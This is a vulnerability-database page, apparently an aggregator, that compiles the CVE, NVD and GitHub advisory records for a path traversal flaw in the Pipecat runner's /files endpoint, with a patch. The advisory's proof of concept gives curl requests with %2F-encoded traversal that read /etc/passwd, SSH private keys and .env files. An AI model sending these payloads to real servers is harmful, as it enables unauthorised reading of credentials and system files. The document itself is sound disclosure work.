CVE-2026-44716 (GCVE-0-2026-44716)
Vulnerability from cvelistv5 – Published: 2026-06-09 23:07 – Updated: 2026-06-10 13:14
VLAI
Title
Pipecat: Path Traversal in Pipecat Runner `/files` Endpoint — Arbitrary File Read via `%2F`-Encoded Separator
Summary
Pipecat is an open-source Python framework for building real-time voice and multimodal conversational agents. From version 0.0.90 to before version 1.2.0, a path traversal vulnerability exists in Pipecat's development runner (src/pipecat/runner/run.py). When the runner is started with the --folder flag, it exposes a GET /files/{filename:path} download endpoint. The filename path parameter is concatenated directly onto args.folder with no containment check. Starlette normalises literal ../ sequences in URLs, but %2F-encoded slashes bypass this normalisation: the path parameter is URL-decoded after routing, so ..%2F..%2Fetc%2Fpasswd resolves to a path two levels above args.folder. An attacker with network access to the runner can read any file the pipecat process has permission to access — including SSH private keys, credentials, and system files — with a single unauthenticated HTTP request. This issue has been patched in version 1.2.0.
Severity
7.5 (High)
SSVC
Exploitation: poc
Automatable: yes
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
- CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Assigner
References
4 references
| URL | Tags |
|---|---|
| https://github.com/pipecat-ai/pipecat/security/ad… | x_refsource_CONFIRM |
| https://github.com/pipecat-ai/pipecat/pull/4417 | x_refsource_MISC |
| https://github.com/pipecat-ai/pipecat/commit/7519… | x_refsource_MISC |
| https://github.com/pipecat-ai/pipecat/releases/ta… | x_refsource_MISC |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| pipecat-ai | pipecat |
Affected:
>= 0.0.90, < 1.2.0
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-44716",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-06-10T13:13:50.203389Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-06-10T13:14:07.004Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "pipecat",
"vendor": "pipecat-ai",
"versions": [
{
"status": "affected",
"version": "\u003e= 0.0.90, \u003c 1.2.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Pipecat is an open-source Python framework for building real-time voice and multimodal conversational agents. From version 0.0.90 to before version 1.2.0, a path traversal vulnerability exists in Pipecat\u0027s development runner (src/pipecat/runner/run.py). When the runner is started with the --folder flag, it exposes a GET /files/{filename:path} download endpoint. The filename path parameter is concatenated directly onto args.folder with no containment check. Starlette normalises literal ../ sequences in URLs, but %2F-encoded slashes bypass this normalisation: the path parameter is URL-decoded after routing, so ..%2F..%2Fetc%2Fpasswd resolves to a path two levels above args.folder. An attacker with network access to the runner can read any file the pipecat process has permission to access \u2014 including SSH private keys, credentials, and system files \u2014 with a single unauthenticated HTTP request. This issue has been patched in version 1.2.0."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-22",
"description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-06-09T23:07:25.868Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/pipecat-ai/pipecat/security/advisories/GHSA-3363-2ph6-35wh",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/pipecat-ai/pipecat/security/advisories/GHSA-3363-2ph6-35wh"
},
{
"name": "https://github.com/pipecat-ai/pipecat/pull/4417",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pipecat-ai/pipecat/pull/4417"
},
{
"name": "https://github.com/pipecat-ai/pipecat/commit/7519c26ac5508573c35fa3a9c4717b013993d129",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pipecat-ai/pipecat/commit/7519c26ac5508573c35fa3a9c4717b013993d129"
},
{
"name": "https://github.com/pipecat-ai/pipecat/releases/tag/v1.2.0",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pipecat-ai/pipecat/releases/tag/v1.2.0"
}
],
"source": {
"advisory": "GHSA-3363-2ph6-35wh",
"discovery": "UNKNOWN"
},
"title": "Pipecat: Path Traversal in Pipecat Runner `/files` Endpoint \u2014 Arbitrary File Read via `%2F`-Encoded Separator"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-44716",
"datePublished": "2026-06-09T23:07:25.868Z",
"dateReserved": "2026-05-07T17:07:09.319Z",
"dateUpdated": "2026-06-10T13:14:07.004Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-44716",
"date": "2026-06-27",
"epss": "0.00423",
"percentile": "0.33928"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-44716\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-06-10T00:16:53.110\",\"lastModified\":\"2026-06-12T14:00:16.413\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Pipecat is an open-source Python framework for building real-time voice and multimodal conversational agents. From version 0.0.90 to before version 1.2.0, a path traversal vulnerability exists in Pipecat\u0027s development runner (src/pipecat/runner/run.py). When the runner is started with the --folder flag, it exposes a GET /files/{filename:path} download endpoint. The filename path parameter is concatenated directly onto args.folder with no containment check. Starlette normalises literal ../ sequences in URLs, but %2F-encoded slashes bypass this normalisation: the path parameter is URL-decoded after routing, so ..%2F..%2Fetc%2Fpasswd resolves to a path two levels above args.folder. An attacker with network access to the runner can read any file the pipecat process has permission to access \u2014 including SSH private keys, credentials, and system files \u2014 with a single unauthenticated HTTP request. This issue has been patched in version 1.2.0.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:pipecat:pipecat:*:*:*:*:*:python:*:*\",\"versionStartIncluding\":\"0.0.90\",\"versionEndExcluding\":\"1.2.0\",\"matchCriteriaId\":\"B0A9BA71-D10B-4DA6-9BDC-A771F4FE5E72\"}]}]}],\"references\":[{\"url\":\"https://github.com/pipecat-ai/pipecat/commit/7519c26ac5508573c35fa3a9c4717b013993d129\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/pipecat-ai/pipecat/pull/4417\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Issue Tracking\",\"Patch\"]},{\"url\":\"https://github.com/pipecat-ai/pipecat/releases/tag/v1.2.0\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/pipecat-ai/pipecat/security/advisories/GHSA-3363-2ph6-35wh\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-44716\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-06-10T13:13:50.203389Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-06-10T13:13:54.789Z\"}}], \"cna\": {\"title\": \"Pipecat: Path Traversal in Pipecat Runner `/files` Endpoint \\u2014 Arbitrary File Read via `%2F`-Encoded Separator\", \"source\": {\"advisory\": \"GHSA-3363-2ph6-35wh\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"pipecat-ai\", \"product\": \"pipecat\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 0.0.90, \u003c 1.2.0\"}]}], \"references\": [{\"url\": \"https://github.com/pipecat-ai/pipecat/security/advisories/GHSA-3363-2ph6-35wh\", \"name\": \"https://github.com/pipecat-ai/pipecat/security/advisories/GHSA-3363-2ph6-35wh\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/pipecat-ai/pipecat/pull/4417\", \"name\": \"https://github.com/pipecat-ai/pipecat/pull/4417\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/pipecat-ai/pipecat/commit/7519c26ac5508573c35fa3a9c4717b013993d129\", \"name\": \"https://github.com/pipecat-ai/pipecat/commit/7519c26ac5508573c35fa3a9c4717b013993d129\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/pipecat-ai/pipecat/releases/tag/v1.2.0\", \"name\": \"https://github.com/pipecat-ai/pipecat/releases/tag/v1.2.0\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Pipecat is an open-source Python framework for building real-time voice and multimodal conversational agents. From version 0.0.90 to before version 1.2.0, a path traversal vulnerability exists in Pipecat\u0027s development runner (src/pipecat/runner/run.py). When the runner is started with the --folder flag, it exposes a GET /files/{filename:path} download endpoint. The filename path parameter is concatenated directly onto args.folder with no containment check. Starlette normalises literal ../ sequences in URLs, but %2F-encoded slashes bypass this normalisation: the path parameter is URL-decoded after routing, so ..%2F..%2Fetc%2Fpasswd resolves to a path two levels above args.folder. An attacker with network access to the runner can read any file the pipecat process has permission to access \\u2014 including SSH private keys, credentials, and system files \\u2014 with a single unauthenticated HTTP request. This issue has been patched in version 1.2.0.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-22\", \"description\": \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-06-09T23:07:25.868Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-44716\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-06-10T13:14:07.004Z\", \"dateReserved\": \"2026-05-07T17:07:09.319Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-06-09T23:07:25.868Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-44716
Vulnerability from fkie_nvd - Published: 2026-06-10 00:16 - Updated: 2026-06-17 10:51
Severity
Summary
Pipecat is an open-source Python framework for building real-time voice and multimodal conversational agents. From version 0.0.90 to before version 1.2.0, a path traversal vulnerability exists in Pipecat's development runner (src/pipecat/runner/run.py). When the runner is started with the --folder flag, it exposes a GET /files/{filename:path} download endpoint. The filename path parameter is concatenated directly onto args.folder with no containment check. Starlette normalises literal ../ sequences in URLs, but %2F-encoded slashes bypass this normalisation: the path parameter is URL-decoded after routing, so ..%2F..%2Fetc%2Fpasswd resolves to a path two levels above args.folder. An attacker with network access to the runner can read any file the pipecat process has permission to access — including SSH private keys, credentials, and system files — with a single unauthenticated HTTP request. This issue has been patched in version 1.2.0.
References
{
"affected": [
{
"affectedData": [
{
"product": "pipecat",
"vendor": "pipecat-ai",
"versions": [
{
"status": "affected",
"version": "\u003e= 0.0.90, \u003c 1.2.0"
}
]
}
],
"source": "security-advisories@github.com"
}
],
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pipecat:pipecat:*:*:*:*:*:python:*:*",
"matchCriteriaId": "B0A9BA71-D10B-4DA6-9BDC-A771F4FE5E72",
"versionEndExcluding": "1.2.0",
"versionStartIncluding": "0.0.90",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Pipecat is an open-source Python framework for building real-time voice and multimodal conversational agents. From version 0.0.90 to before version 1.2.0, a path traversal vulnerability exists in Pipecat\u0027s development runner (src/pipecat/runner/run.py). When the runner is started with the --folder flag, it exposes a GET /files/{filename:path} download endpoint. The filename path parameter is concatenated directly onto args.folder with no containment check. Starlette normalises literal ../ sequences in URLs, but %2F-encoded slashes bypass this normalisation: the path parameter is URL-decoded after routing, so ..%2F..%2Fetc%2Fpasswd resolves to a path two levels above args.folder. An attacker with network access to the runner can read any file the pipecat process has permission to access \u2014 including SSH private keys, credentials, and system files \u2014 with a single unauthenticated HTTP request. This issue has been patched in version 1.2.0."
}
],
"id": "CVE-2026-44716",
"lastModified": "2026-06-17T10:51:16.083",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
}
],
"ssvcV203": [
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"ssvcData": {
"id": "CVE-2026-44716",
"options": [
{
"exploitation": "poc"
},
{
"automatable": "yes"
},
{
"technicalImpact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-06-10T13:13:50.203389Z",
"version": "2.0.3"
}
}
]
},
"published": "2026-06-10T00:16:53.110",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/pipecat-ai/pipecat/commit/7519c26ac5508573c35fa3a9c4717b013993d129"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/pipecat-ai/pipecat/pull/4417"
},
{
"source": "security-advisories@github.com",
"tags": [
"Release Notes"
],
"url": "https://github.com/pipecat-ai/pipecat/releases/tag/v1.2.0"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/pipecat-ai/pipecat/security/advisories/GHSA-3363-2ph6-35wh"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-22"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-3363-2PH6-35WH
Vulnerability from github – Published: 2026-05-15 16:55 – Updated: 2026-06-10 13:41
VLAI
Summary
Pipecat: Path Traversal in Pipecat Runner `/files` Endpoint — Arbitrary File Read via `%2F`-Encoded Separator
Details
Summary
A path traversal vulnerability exists in Pipecat's development runner (src/pipecat/runner/run.py). When the runner is started with the --folder flag, it exposes a GET /files/{filename:path} download endpoint. The filename path parameter is concatenated directly onto args.folder with no containment check. Starlette normalises literal ../ sequences in URLs, but %2F-encoded slashes bypass this normalisation: the path parameter is URL-decoded after routing, so ..%2F..%2Fetc%2Fpasswd resolves to a path two levels above args.folder. An attacker with network access to the runner can read any file the pipecat process has permission to access — including SSH private keys, credentials, and system files — with a single unauthenticated HTTP request.
Confirmed on pipecat-ai 1.1.0 (latest PyPI release) and commit f078df78058ae82a02ce5b23e9e3a99a0917a53d.
Details
The vulnerable code is in src/pipecat/runner/run.py, inside the _configure_server_app() function, lines 249–264:
@app.get("/files/{filename:path}")
async def download_file(filename: str):
"""Handle file downloads."""
if not args.folder:
logger.warning(f"Attempting to dowload {filename}, but downloads folder not setup.")
return
file_path = Path(args.folder) / filename # ← no containment check
if not os.path.exists(file_path):
raise HTTPException(404)
media_type, _ = mimetypes.guess_type(file_path)
return FileResponse(path=file_path, media_type=media_type, filename=filename)
Path(args.folder) / filename joins the caller-supplied filename onto the base directory without calling .resolve() or checking is_relative_to. Python's pathlib does not strip .. segments during join — only .resolve() does. Starlette strips literal ../ from the URL path before the route handler runs, but it decodes percent-encoded characters inside the matched path parameter value. Because %2F decodes to / after the router has already matched the route, the value that reaches filename can contain / characters, enabling directory traversal.
For example:
GET /files/..%2F..%2Fetc%2Fpasswd
↓
filename = "../../etc/passwd" (after Starlette decodes %2F)
file_path = Path("/tmp/media") / "../../etc/passwd"
= Path("/tmp/media/../../etc/passwd")
→ resolves to /etc/passwd (os.path.exists returns True)
The endpoint has no authentication — the runner does not implement any auth layer — so the request requires no credentials.
Proof of Concept
Step 1 — Start the Pipecat runner with --folder
The runner requires a bot script with a bot() entry point. A minimal script that keeps the HTTP server alive without any transport logic:
# minimal_bot.py
async def bot(runner_args):
import asyncio
await asyncio.sleep(86400)
if __name__ == "__main__":
from pipecat.runner.run import main
main()
Start the runner:
pip install "pipecat-ai[runner,webrtc]"
mkdir /tmp/bot_media
echo "session transcript" > /tmp/bot_media/recording.txt
python minimal_bot.py \
-t webrtc \
--host 127.0.0.1 \
--port 7860 \
--folder /tmp/bot_media
Expected output:
Step 2 — Exploit
# Legitimate request — serves a file inside --folder
curl "http://127.0.0.1:7860/files/recording.txt"
# → session transcript
# Literal ../ — blocked by Starlette path normalisation
curl "http://127.0.0.1:7860/files/../../etc/passwd"
# → {"detail":"Not Found"}
# %2F-encoded separators — bypass normalisation, read /etc/passwd
curl "http://127.0.0.1:7860/files/..%2F..%2Fetc%2Fpasswd"
# → ## User Database
# root:*:0:0:System Administrator:/var/root:/bin/sh
# ...
# Read SSH private key
curl "http://127.0.0.1:7860/files/..%2F..%2F..%2Fhome%2Fuser%2F.ssh%2Fid_rsa"
# → -----BEGIN OPENSSH PRIVATE KEY-----
# b3BlbnNzaC1rZXktdjEAAAA...
# Read application secrets
curl "http://127.0.0.1:7860/files/..%2F..%2F.env"
Confirmed results (pipecat-ai 1.1.0, tested 2026-04-29)
| Request | HTTP status | Content |
|---|---|---|
GET /files/recording.txt |
200 | Legitimate file |
GET /files/../../etc/passwd |
404 | Blocked — literal .. normalised away |
GET /files/..%2F..%2Fetc%2Fpasswd |
200 | Full /etc/passwd |
GET /files/..%2F..%2F..%2Fhome/…/.ssh/id_rsa |
200 | RSA private key (BEGIN OPENSSH PRIVATE KEY) |
Impact
The --folder flag is a documented, first-class feature of the runner: the runner_downloads_folder() helper and -f / --folder CLI argument are part of the public API. The runner documentation includes LAN-deployment examples (--host 192.168.1.100 for ESP32 integration). In those deployments, any host on the local network can exploit this with zero credentials.
An attacker who can reach the runner port and knows --folder is active can retrieve any file readable by the pipecat process:
- SSH private keys and TLS certificates
.envfiles and application credentials- Database files, session tokens, API keys
- System files such as
/etc/passwdand/etc/shadow(on Linux) - Source code, config files, and secrets in parent directories of
--folder
Remediation
Call .resolve() on both the base path and the joined path, then assert containment with is_relative_to:
@app.get("/files/{filename:path}")
async def download_file(filename: str):
if not args.folder:
logger.warning(f"Attempting to dowload {filename}, but downloads folder not setup.")
return
allowed_base = Path(args.folder).resolve()
file_path = (allowed_base / filename).resolve() # resolve AFTER join
if not file_path.is_relative_to(allowed_base): # containment check
raise HTTPException(status_code=403, detail="Access denied")
if not file_path.exists():
raise HTTPException(status_code=404)
media_type, _ = mimetypes.guess_type(file_path)
return FileResponse(path=file_path, media_type=media_type, filename=file_path.name)
Path.resolve() expands all .. components and follows symlinks before is_relative_to compares the paths, so neither %2F-encoded separators nor symlink chains can escape the allowed base.
Severity
7.5 (High)
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "pipecat-ai"
},
"ranges": [
{
"events": [
{
"introduced": "0.0.90"
},
{
"fixed": "1.2.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44716"
],
"database_specific": {
"cwe_ids": [
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-15T16:55:04Z",
"nvd_published_at": "2026-06-10T00:16:53Z",
"severity": "HIGH"
},
"details": "## Summary\n\nA path traversal vulnerability exists in Pipecat\u0027s development runner (`src/pipecat/runner/run.py`). When the runner is started with the `--folder` flag, it exposes a `GET /files/{filename:path}` download endpoint. The `filename` path parameter is concatenated directly onto `args.folder` with no containment check. Starlette normalises literal `../` sequences in URLs, but `%2F`-encoded slashes bypass this normalisation: the path parameter is URL-decoded *after* routing, so `..%2F..%2Fetc%2Fpasswd` resolves to a path two levels above `args.folder`. An attacker with network access to the runner can read any file the pipecat process has permission to access \u2014 including SSH private keys, credentials, and system files \u2014 with a single unauthenticated HTTP request.\n\nConfirmed on **pipecat-ai 1.1.0** (latest PyPI release) and commit `f078df78058ae82a02ce5b23e9e3a99a0917a53d`.\n\n---\n\n## Details\n\nThe vulnerable code is in `src/pipecat/runner/run.py`, inside the `_configure_server_app()` function, lines 249\u2013264:\n\n```python\n@app.get(\"/files/{filename:path}\")\nasync def download_file(filename: str):\n \"\"\"Handle file downloads.\"\"\"\n if not args.folder:\n logger.warning(f\"Attempting to dowload {filename}, but downloads folder not setup.\")\n return\n\n file_path = Path(args.folder) / filename # \u2190 no containment check\n if not os.path.exists(file_path):\n raise HTTPException(404)\n\n media_type, _ = mimetypes.guess_type(file_path)\n\n return FileResponse(path=file_path, media_type=media_type, filename=filename)\n```\n\n`Path(args.folder) / filename` joins the caller-supplied `filename` onto the base directory without calling `.resolve()` or checking `is_relative_to`. Python\u0027s `pathlib` does not strip `..` segments during join \u2014 only `.resolve()` does. Starlette strips literal `../` from the *URL path* before the route handler runs, but it decodes percent-encoded characters *inside* the matched path parameter value. Because `%2F` decodes to `/` after the router has already matched the route, the value that reaches `filename` can contain `/` characters, enabling directory traversal.\n\nFor example:\n\n```\nGET /files/..%2F..%2Fetc%2Fpasswd\n \u2193\nfilename = \"../../etc/passwd\" (after Starlette decodes %2F)\nfile_path = Path(\"/tmp/media\") / \"../../etc/passwd\"\n = Path(\"/tmp/media/../../etc/passwd\")\n \u2192 resolves to /etc/passwd (os.path.exists returns True)\n```\n\nThe endpoint has no authentication \u2014 the runner does not implement any auth layer \u2014 so the request requires no credentials.\n\n---\n\n## Proof of Concept\n\n### Step 1 \u2014 Start the Pipecat runner with `--folder`\n\nThe runner requires a bot script with a `bot()` entry point. A minimal script that keeps the HTTP server alive without any transport logic:\n\n```python\n# minimal_bot.py\nasync def bot(runner_args):\n import asyncio\n await asyncio.sleep(86400)\n\nif __name__ == \"__main__\":\n from pipecat.runner.run import main\n main()\n```\n\nStart the runner:\n\n```bash\npip install \"pipecat-ai[runner,webrtc]\"\n\nmkdir /tmp/bot_media\necho \"session transcript\" \u003e /tmp/bot_media/recording.txt\n\npython minimal_bot.py \\\n -t webrtc \\\n --host 127.0.0.1 \\\n --port 7860 \\\n --folder /tmp/bot_media\n```\n\nExpected output:\n\u003cimg width=\"1626\" height=\"462\" alt=\"image\" src=\"https://github.com/user-attachments/assets/912e8ea2-cff9-4a36-a6be-e85091d9f89f\" /\u003e\n\n### Step 2 \u2014 Exploit\n\n```bash\n# Legitimate request \u2014 serves a file inside --folder\ncurl \"http://127.0.0.1:7860/files/recording.txt\"\n# \u2192 session transcript\n\n# Literal ../ \u2014 blocked by Starlette path normalisation\ncurl \"http://127.0.0.1:7860/files/../../etc/passwd\"\n# \u2192 {\"detail\":\"Not Found\"}\n\n# %2F-encoded separators \u2014 bypass normalisation, read /etc/passwd\ncurl \"http://127.0.0.1:7860/files/..%2F..%2Fetc%2Fpasswd\"\n# \u2192 ## User Database\n# root:*:0:0:System Administrator:/var/root:/bin/sh\n# ...\n\n# Read SSH private key\ncurl \"http://127.0.0.1:7860/files/..%2F..%2F..%2Fhome%2Fuser%2F.ssh%2Fid_rsa\"\n# \u2192 -----BEGIN OPENSSH PRIVATE KEY-----\n# b3BlbnNzaC1rZXktdjEAAAA...\n\n# Read application secrets\ncurl \"http://127.0.0.1:7860/files/..%2F..%2F.env\"\n```\n\n### Confirmed results (pipecat-ai 1.1.0, tested 2026-04-29)\n\n| Request | HTTP status | Content |\n|---------|-------------|---------|\n| `GET /files/recording.txt` | 200 | Legitimate file |\n| `GET /files/../../etc/passwd` | 404 | Blocked \u2014 literal `..` normalised away |\n| `GET /files/..%2F..%2Fetc%2Fpasswd` | **200** | Full `/etc/passwd` |\n| `GET /files/..%2F..%2F..%2Fhome/\u2026/.ssh/id_rsa` | **200** | RSA private key (`BEGIN OPENSSH PRIVATE KEY`) |\n\u003cimg width=\"2222\" height=\"516\" alt=\"image\" src=\"https://github.com/user-attachments/assets/4c7a014c-8646-479a-8439-b8e722a69e49\" /\u003e\n\u003cimg width=\"1304\" height=\"314\" alt=\"image\" src=\"https://github.com/user-attachments/assets/14f71b3f-2a35-4d2b-8049-8af758fbc6ba\" /\u003e\n\u003cimg width=\"1188\" height=\"390\" alt=\"image\" src=\"https://github.com/user-attachments/assets/53fe2b33-2cd3-4745-b9f2-7aa426318e00\" /\u003e\n\n---\n\n## Impact\n\nThe `--folder` flag is a documented, first-class feature of the runner: the `runner_downloads_folder()` helper and `-f / --folder` CLI argument are part of the public API. The runner documentation includes LAN-deployment examples (`--host 192.168.1.100` for ESP32 integration). In those deployments, any host on the local network can exploit this with zero credentials.\n\nAn attacker who can reach the runner port and knows `--folder` is active can retrieve any file readable by the pipecat process:\n\n- SSH private keys and TLS certificates\n- `.env` files and application credentials\n- Database files, session tokens, API keys\n- System files such as `/etc/passwd` and `/etc/shadow` (on Linux)\n- Source code, config files, and secrets in parent directories of `--folder`\n\n---\n\n## Remediation\n\nCall `.resolve()` on both the base path and the joined path, then assert containment with `is_relative_to`:\n\n```python\n@app.get(\"/files/{filename:path}\")\nasync def download_file(filename: str):\n if not args.folder:\n logger.warning(f\"Attempting to dowload {filename}, but downloads folder not setup.\")\n return\n\n allowed_base = Path(args.folder).resolve()\n file_path = (allowed_base / filename).resolve() # resolve AFTER join\n\n if not file_path.is_relative_to(allowed_base): # containment check\n raise HTTPException(status_code=403, detail=\"Access denied\")\n if not file_path.exists():\n raise HTTPException(status_code=404)\n\n media_type, _ = mimetypes.guess_type(file_path)\n return FileResponse(path=file_path, media_type=media_type, filename=file_path.name)\n```\n\n`Path.resolve()` expands all `..` components and follows symlinks before `is_relative_to` compares the paths, so neither `%2F`-encoded separators nor symlink chains can escape the allowed base.",
"id": "GHSA-3363-2ph6-35wh",
"modified": "2026-06-10T13:41:01Z",
"published": "2026-05-15T16:55:04Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pipecat-ai/pipecat/security/advisories/GHSA-3363-2ph6-35wh"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44716"
},
{
"type": "WEB",
"url": "https://github.com/pipecat-ai/pipecat/pull/4417"
},
{
"type": "WEB",
"url": "https://github.com/pipecat-ai/pipecat/commit/7519c26ac5508573c35fa3a9c4717b013993d129"
},
{
"type": "PACKAGE",
"url": "https://github.com/pipecat-ai/pipecat"
},
{
"type": "WEB",
"url": "https://github.com/pipecat-ai/pipecat/releases/tag/v1.2.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Pipecat: Path Traversal in Pipecat Runner `/files` Endpoint \u2014 Arbitrary File Read via `%2F`-Encoded Separator"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
